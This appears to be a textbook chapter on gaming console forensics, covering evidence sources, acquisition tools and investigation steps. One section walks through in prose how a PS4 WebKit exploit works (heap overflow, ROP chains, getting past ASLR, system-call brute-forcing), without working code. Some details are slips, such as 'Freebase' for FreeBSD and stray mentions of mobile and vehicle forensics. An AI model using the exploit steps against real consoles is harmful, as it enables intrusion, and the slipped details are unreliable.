Chapter 8: Gaming Consoles Forensics

Many gaming consoles -like Nintendo Wii, Xbox, PlayStation etc- have made their place
in the market today. Their basic architecture is similar to any computer, for example they
contain hard drive just like any computer, they have some operating system too for the
software operations, etc. Since gaming Consoles have an associated memory, they can
store data in a similar fashion as the computers. The software and optimization of a
console and its games are where a gaming console becomes more ‘suited’. The hardware
in the console it optimized to work well with each other and the software is optimized to
work specifically well with that exact hardware whereas PC software has to cover many
types and combination of hardware.
Gaming consoles are basically invented for playing games, but these modules can also be
used to watch videos and movies, and browse the internet. The internet history and data
about the games and the movies are stored on the hard drive and can be retrieved using
the Digital Forensic procedures. Xbox and Play Station use a von Neumann architecture,
both the program and data are transferred on the same bus to RAM and the RAM
contains both instructions and data. So, the volatile memory can also provide important
Digital traces for the DF process.
These gaming consoles also provide an option to play games online. For the purpose, a
gamer needs to create his account, for example if one is using Xbox, he needs to create
account on Xbox live for playing games online. This creates another chunk of evidence
for the Digital Forensics investigator.
Moreover, computer and gaming consoles can be used together as evidence, for example
there is option with these modules to send e-mail about the performance of player during
the match upon the completion of a game. Information like this may seem irrelevant but it
can help the investigator to collect data and time stamps. Therefore, these systems are a
great source of evidence during the digital forensics process.
In spite of the vital data it contains, there is very little academic research has been done
for the security of gaming consoles. As today’s devices have ability to connect to the
internet and can get affected by the zero days vulnerabilities too, so it is important to
device a process that can help retrack the attack and remove it.
Before setting a procedure to perform the digital forensics on these consoles, one must
know how the vulnerabilities are being exploited and where digital forensics is in need to
detect the issue.
Exploiting Vulnerabilities on Consoles like PS4:
The red hats can sabotage these modules in very few steps. First thing a hacker would do
is find out what software runs on the console. For example, if the target gaming console
is PS4. The PS4 runs on a custom AMD x86-64 CPU with 8 cores. This CPU architecture
is very well documented with research papers available on the internet. Even though this
one may differ a bit, the fundamental operations should be the same. PS4 console runs
Orbis Operating System (OS). This OS is based on Freebase 9.0. Even this information
about the OS of the console is very important for the hacker because the OS come with
other open-source software. Particularly interesting is WebKit. It is an open-source layout
engine that is used on the PS4 to render web pages on the browser. WebKit has some
documented vulnerabilities that can be exploited. For example CVE-2012–3748 is a
heap-based buffer overflow in the JSArray::sort(…) method. This vulnerability can be
exploited to give read and write access to everything the WebKit process can read and
write to. Therefore, this can be used to overwrite return addresses on the stack and taking
control of the instruction pointer register(rip). The next thing is to copy a payload into
memory and use the rip to execute it.
PS4 has a kernel that controls the properties of different parts of memory. The kernel has
Data Execution Prevention (DEP) in that pages of memory which are marked as
“executable” cannot be overwritten and pages of memory which are marked as “writable”
cannot be executed. So, a payload cannot just be copied into memory and get executed.
However, a code can be executed that is already loaded into memory and marked as
“executable”. To write the own code and mark it as “executable”, hackers turn to stack
smashing. Particularly ROP (Return-Oriented Programming) where one can overwrite a
chain of memory addresses where the rip will jump to in sequence. These chains are
called gadgets. A gadget is a single desired instruction followed by a ret. In x86_64
assembly, when a ret instruction is reached, a 64-bit value is popped off the stack and rip
jumps to it. And now that stack is in control, one can make every ret instruction jump to
the gadget we want. For example, from 0x80000 contains instructions,

then from 0x90000 contains instructions,

If a hacker overwrites a return address on the stack to contain 0x80000 followed by
0x90000, then as soon as the first ret instruction is reached execution will jump to mov
rax, 0, and immediately afterwards, the next ret instruction will pop 0x90000 off the stack
and jump to mov rbx, 0. Therefore, the hacker has now a way to exploit the vulnerability.
The PS4 has ASLR (Address Space Layout Randomization) implemented. This is a
security technique that causes the base addresses of modules to be different every time
the PS4 is started. So that means that the hacker would have no idea what addresses their
gadgets reside on. So he won't know what to write to the stack. So, for the purpose he can
stay away from static ROP chains. When all modules are loaded, their base addresses are
populated in the modules table. If he can read the modules table, he can easily calculate
the addresses of ROP gadgets before he triggers execution. This can be done using
JavaScript.
System calls can help to interact with kernel. FreeBSD uses the UNIX convention of
calling for system calls with arguments stored in the stack. But on the PS4, the LINUX
convention is used where arguments are stored in registers. So in this way a list of system
calls can be obtained to tinker with.
PID tells important information about the processes. The WebKit core that parses HTML
and CSS, executes JavaScript and decodes images, and another one to handle user input,
displaying graphics, history, bookmarks and everything else. Next, analyse system calls
by reverse-engineering module dumps. Some system calls are not referenced in the
module dumps, so, analyse them using brute force. If guess can be made that a certain
system call might take a particular set of arguments, brute force can be performed to all
system calls which return a certain value ( 0 for success) with the arguments that were
chosen, and ignore all which returned an error.
Zeros (0s) can also be passed for all arguments, and brute force all system calls which
return useful errors such as 0xe , "Bad address" , which would indicate that they take at
least one pointer. To find the vulnerability associated with the system calls look at the
data manipulated on disk before and after the system call. If the data hasn't changed, it
could be an input prompt. Feed a long string as an argument to look for a buffer
overflow. Or simply see if there's a type mismatch. Or a NULL truncator to limit the
length and prevent an overflow. This is a very long process. But necessary to identify the
system calls that can get us into the kernel.
After the system call, file system can be looked for the vulnerabilities. Unfortunately, due
to sandboxing, one cannot have access to the entire file system. The files that can only be
accessed include encrypted save data and account information. So, these files can also be
exploited.
For digital forensics a RAM can help. Dump the RAM and perform memory analysis and
forensics tools to analyse the system calls and file systems etc to find any problem or
vulnerability.
Gaming Consoles and network:
The gaming consoles are similar to any computer. They are connected to a network for
browsing and online gaming and movies etc. gaming console can be directly connected to
the router or hub of the network via a LAN segment. In this way all the vulnerabilities
associated with the network can also harm the consoles. Digital forensics for network can
be performed using tools like Wireshark that can provide the network traffic details.
Figure 8.1 shows the connections of gaming console with router.

Figure 8.1: Gaming console connection to LAN and WAN

1.1. Security of Gaming consoles and need of DF

Modern times game console systems are not exclusive for gaming but like any other
computer they are lot more other functionalities too like internet browsing, messaging,
video or movie streaming etc. As they have become more advanced and powerful now so
they are more prone to external, internal and network attacks.
The next generation of gaming consoles are more advanced form in respect to the
connectivity, computing power and the availability. As these modules became more
advance and powerful and the hardware and software both have become complex, this
has created many types of new vulnerabilities. There are millions of their users. Alone
PlayStation 2 sold over 100 million units in the past.
Computer security has always remained an important topic among the researchers since
the invention of the first virus. Similarly, it is important for the gaming console
manufacturers to consider the security perspective of these modules as soon as possible.
Similarly, there are other concerns too with regard to gaming consoles. Games are a mean
of entertainment and fun, so in this perspective a gaming console is an advanced toy.
User sometimes forget to hide their personal information as the module is connected over
the internet and as a result get dodged by the hackers and other red hats.
Video games are around for like quite long and are the basic thought behind the design of
any gaming console. First such game was invented in the end of 1940’s and since then
this field has seen many evolutions. Although these games are for entertainment purpose
but there are many dark sides of connecting to these games too. One of an important
down side is cheating. Cheating can kill sports man ship moral.
Need of Gaming Console Forensics:
The question arises: Why do we need gaming console forensics? The answer lies in the
fact that every digital object in this world is somehow prone to security attacks. And
criminal investigation needs to perform forensic analysis of each device that is connected
to the network where the gaming console is working. But this is a cumbersome job. The
multiplication of gaming console devices and increased number of cyber-attacks gives
rise to a new branch of forensics; gaming console Forensics. It is more complex and
multifaceted than the traditional forensic framework for computer forensics or network
forensics.
Although it is a fact that these consoles do face a lot of security challenges and requires
object driven models to avoid exploitation. Similarly for postmortem of any digital event,
we also need object driven forensic frameworks. Hence, we can say that gaming console
Forensics deals with the investigation of cybercrimes happened on these modules. It
includes data preservation and analysis of sensors, data stored on all the platforms that
are connected using the network and the cloud storage.
Gaming console Forensics is an amalgamation of different types of digital forensics like
cloud forensics, network forensics, computer forensics etc. Random Access Memory
(RAM) in such devices is too small and these devices try to forward data as soon as
possible. The data transfers usually in an encrypted form over the network. The data from
consoles is usually processed in some cloud environment that is located at some different
place. This makes gaming console Forensics a bit of challenging task.
Digital Forensic is a process that can help to detect any breach or security issue with the
device. As gaming consoles are prone to security attacks and breaches so digital forensics
is important to document any issue. Before getting started with the digital forensics
process of the gaming consoles, one has firm idea about the computer network and cloud
forensics.
1. Computer Forensics:
Art of Collecting Evidences in such a form that it can be presented to the third
party and is admissible in room of court. Series of Techniques and procedures for
gathering evidence. from Computing Equipment and different digital medias that
can be presented in a court of law in a meaningful format. The preservation,
identification, extraction, interpretation and documentation of computer evidence,
to include the rules of evidence, legal processes, integrity of evidence, reporting of
the finding's and providing of expert opinion in a court of law or other legal
proceedings. This can be achieved in following Manner
a. Preserving the Crime Scene
b. Tagging the Evidences
c. Filling Digital Evidence Forms
d. Maintaining Chain of Custody
e. Evidence Handling
f. Restricting Access to Need to Know Basis
g. Forensic Sound Acquisitions
h. Preserving Original Evidences
i. Analyzing the Evidences
j. Presenting the Evidences

2. Network Forensics:
Network forensics plays a crucial role in an organization’s incident response
process or post-incident investigation. When a security incident is detected, the
incident response process gets initiated and the affected organization seeks to find
out the extent of an incident and potential impact it can have. Further, “how did it
happen?” is also one of the questions that need to be answered. Considering that
the attackers would interact with an organization’s network in launching their
attack(s), logs from network devices can help in the determination of the type of
attack and track the steps taken by the attacker. In certain cases, data gathered
 during these steps may need to be presented as evidence before a regulatory
authority or a court.

3. Cloud Forensics:
Gaming consoles devices are sometimes connected to some cloud because their memory
is usually very low so they require to transfer data to a safe place as soon as possible.
Cloud services also provide processing the data services. Cloud level forensics
investigate the data at cloud when an attack occurs.

1.2. Digital Surveillance for Xbox Kit (XFT Device)

Although tools from computer and network forensics can be used to perform the digital
forensics on the gaming consoles but there an increasing need of specialized tool that can
directly report the data from the gaming console like Xbox and others as the
manufacturing of gaming consoles is getting advancement.
If talk about the Xbox only with the increasing complexity, there are a lot of
opportunities for hackers and other criminals now to exploit the ever-increasing
vulnerabilities and risk factors. There is a lot data that is stored on the RAM and hard
drives of a gaming console that is also vulnerable.
The problem arises when the law enforcement agencies collect the evidence, they usually
overlook a gaming console as an important source of evidence. But in recent years the but
now that law enforcement has realized the gaming consoles potential, they are becoming
a good source of evidence.
The XFT Device allows cyber forensics teams to retrieve hidden data off a gaming
console hard drive that might have previously gone unnoticed. Hardware and software
can be analyzed with this amazing tool and it opening a whole new door to cyber
forensics that investigation teams are excited to take advantage of.

1.3. Evidence Sources

Forensics process require collection of data through gaming console device, nodes where
the data is transferred and stored like a cloud or computer and network. Sources of
Evidences in case of gaming console forensics are as follow.
1. Gaming console Devices:
The source of evidence can be main gaming console device. The device has some
sort of memory in the form of hard drives and RAM. Furthermore, the passwords
 are also saved in browser memory for the future use. In short anything that is
residing on a memory associated with gaming console can serve as evidence.

2. Network:
The second important source of evidence in case of the gaming console forensics
is the network. The network analysis can also tell a lot of things about the crime
scene.

3. Cloud:
Thirdly the cloud can be a source of evidence. Cloud is an on demand scalable
computing virtualization system. The data is mostly transferred to some cloud so
that’s why we also need to acquire data from the cloud.

The most technical job of any forensic process is the evidence extraction. As discussed
above, for gaming console forensics, there cannot be a single method for extraction due
to different designs, OS, features and connections of the gaming consoles. Hence till date
there is not a single standard framework for mobile forensics especially the extraction
procedure.
Following are some steps that can help to extract evidence from any type of gaming
console irrespective of their manufacturer, version or OS.
1. Intake
The first step is the intake of the evidence. The documentation and paperwork are
done in this phase. Seizure of gaming console must be performed with great care to
avoid any data alteration and removal.

2. Identification
The identification stage is to study the broad features about the gaming consoles. This
includes the legal authority, the purpose of forensic examination, the model and make
of the gaming console, any external or removable storage or any other potential
evidence.

3. Preparation
After the identification, a thorough research must be done about the identified make
and model of the mobile phone and decide tools and methods that can help in the Data
acquisition and Data analysis.

4. Processing
 The next step is to perform acquisition process. The most feasible process is physical
acquisition to extract the raw data. The physical acquisition can be done in OFF state.
Other acquisitions methods are logical acquisition, filesystem acquisition etc that can
be used if the physical acquisition fails to provide the required output.

5. Verification
The investigator then needs to verify the integrity of the extracted data. For the
purpose the data can be compared to the data of the gaming consoles by calculating
the hash values for both of them.

6. Documentation
The next step is to create a report of whole evidence extraction process. The report
must include, the method, the aim of evidence extraction, the gaming console makes
and build, acquisition tools utilized etc.

7. Presentation
The findings during the forensic phase must be documented in a way that the results
are clear, concise, and the process can be repeatable.

8. Archiving
The last step for evidence extraction is the preservation of archiving state. It must be
preserved in a way that data remain intact throughout the court proceedings and can
be used for the future references.

Digital evidence collection requires data acquisition tools. As there is not a single tool
available for complete gaming console analysis. So, tools from computer, network and
device forensics can help to acquire the data. Table 8.1 enlist some open-source data
acquisition tools that can be useful for the gaming console forensics process.
Table 8.1: Open-Source Tools used data acquisition in Gaming Consoles Forensics
Memory Description
Acquisition
FTK Imager is a data preview and imaging tool that lets you quickly
Access Data
assess electronic evidence to determine if further analysis with a
FTK Imager
forensic tool such as Forensic Toolkit (FTK) is warranted.
Dumpit Windows tool for dumping the RAM for analysis.
Magnet Axiom Magnet AXIOM is a complete digital investigation platform
that allows examiners to seamlessly acquire and analyze forensic
 data, as well as share their findings.
Belkasoft RAM Belkasoft Live RAM Capturer is a tiny free forensic tool that allows
Capturer to reliably extract the entire contents of computer’s volatile memory

1.4. The Digital Forensics Process

The general forensic process involves data acquisition, preservation, data analysis and
reporting. The digital vehicle forensics is a very sophisticated procedure and is not been
studied by many researchers.
The process involves following steps:
1. Data Acquisition:
Data acquisition is the most important step of the forensics process. For the vehicle
forensics, this step involves the determination of the gaming console data like version
etc. After that, sources of evidence are determined. Then data acquisition tools are
installed and acquisition is done. The data acquired is preserved for the further use.

2. Data Analysis:
The main step of any forensics process is data analysis step. This step involves the
setup of data analysis tools. Then the investigator filters out the data segments and
events that are relevant. Timeline is created and the event is re-created. The results are
documented for reporting purposes.

3. Documentation:
In this step the reports are collected from the forensics readiness, data acquisition and
data analysis step. A final report containing all the analysis and results is created to be
presented in court or any other authenticated platform.
 References
[1]. Conrad, S., Dorn, G., Craiger, P. (2010). Forensic Analysis of a PlayStation
3 Console. In: Chow, KP., Shenoi, S. (eds) Advances in Digital Forensics VI.
DigitalForensics 2010. IFIP Advances in Information and Communication
Technology, vol 337. Springer, Berlin, Heidelberg. https://doi.org/10.1007/978-3-
642-15506-2_5
[2]. Matthew Davies, Huw Read, Konstantinos Xynos, Iain Sutherland,Forensic
analysis of a Sony PlayStation 4: A first look, Digital Investigation, Volume 12,
Supplement 1, 2015, Pages S81-S89, ISSN 1742-2876,
https://doi.org/10.1016/j.diin.2015.01.013
[3]. Khanji, Salam; Jabir, Raja; Iqbal, Farkhund; and Marrington, Andrew,
"Forensic analysis of xbox one and playstation 4 gaming consoles" (2017). All
Works. 1708. https://zuscholars.zu.ac.ae/works/1708
[4]. S. Khanji, R. Jabir, F. Iqbal and A. Marrington, "Forensic analysis of xbox
one and playstation 4 gaming consoles," 2016 IEEE International Workshop on
Information Forensics and Security (WIFS), 2016, pp. 1-6, doi:
10.1109/WIFS.2016.7823917